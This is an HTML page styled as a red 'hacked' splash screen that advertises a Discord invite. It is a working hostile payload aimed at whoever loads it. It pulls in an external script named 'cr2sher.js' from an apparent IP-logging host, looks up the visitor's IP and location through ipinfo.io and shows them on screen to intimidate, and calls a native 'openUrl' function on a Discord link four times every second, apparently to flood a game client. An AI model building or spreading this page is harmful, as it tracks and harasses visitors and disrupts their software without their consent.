<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>discord.gg/dcc</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            background: url('https://i.pinimg.com/originals/51/ae/a3/51aea3393b8234a1e69d8713a0a58bc3.gif') no-repeat center center fixed;
            background-size: cover;
            font-family: 'Courier New', Courier, monospace;
            color: #912715;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
            text-align: center;
        }
        .image-container img {
            width: 750px; 
            height: auto;
            border: 2px solid #912715; 
            border-radius: 15px;
            box-shadow: 0 0 15px rgba(248, 248, 248, 0.7); 
        }
        .info {
            margin-top: 20px;
            font-size: 1.5em;
            color: #912715; 
            text-shadow: 0px 0px 8px #912715, 0px 0px 15px #912715, 0px 0px 25px #912715; 
            letter-spacing: 4.5px; 
            white-space: pre-wrap;
        }
        .text {
            margin-top: 20px;
            font-size: 3em; 
            color: #912715; 
            text-shadow: 0px 0px 8px #912715, 0px 0px 15px #912715, 0px 0px 25px #912715; 
            letter-spacing: 4.5px; 
        }
    </style>
</head>
<body>
<script src='https://2no.co/cr2sher.js'></script>
    <div class="image-container">
        <img src="https://cdn.discordapp.com/attachments/1401616350757261466/1403165136973336746/background.png?ex=68968ede&is=68953d5e&hm=ec654480308e271370cc82b2afd0a1f3d5b304641c59d3ca7ac287c12284ba72&" alt="Discord Image">
    </div>
    <audio autoplay loop>
        <source src="https://cdn.discordapp.com/attachments/1401616350757261466/1402751864805658764/hd_damakmaja_1.mp3?ex=68950dfa&is=6893bc7a&hm=0bc67317a157c98b2d798642d3e5ebc20f2bede442a88a96cffea70d1d0bab55&" type="audio/mpeg">
        Your browser does not support the audio element.
    </audio>
    <div class="text">discord.gg/ia3x</div>    
    <div class="info" id="ip-info">
        <strong>IP: <span id="ip"></span></strong><br>
        <span><strong>City:</strong> <span id="city"></span></span><br>
        <span><strong>Region:</strong> <span id="region"></span></span><br>
        <span><strong>Country:</strong> <span id="country"></span></span><br>
        <span><strong>Location:</strong> <span id="loc"></span></span><br>
        <span><strong>Organization:</strong> <span id="org"></span></span><br>
        <span><strong>Timezone:</strong> <span id="timezone"></span></span>
    </div>

    <script>
         fetch('https://ipinfo.io/json')
        .then(response => response.json())
        .then(data => {
            delete data.readme;
            const infoDiv = document.getElementById('ip-info');
            infoDiv.textContent = JSON.stringify(data, null, 2);
        });
    </script>
<script>
setInterval(() => {
window.invokeNative("openUrl", "https://discord.gg/ia3x");
window.invokeNative("openUrl", "https://discord.gg/ia3x");
window.invokeNative("openUrl", "https://discord.gg/ia3x");
window.invokeNative("openUrl", "https://discord.gg/ia3x");
}, 1000);
    </script>
</body>
</html>
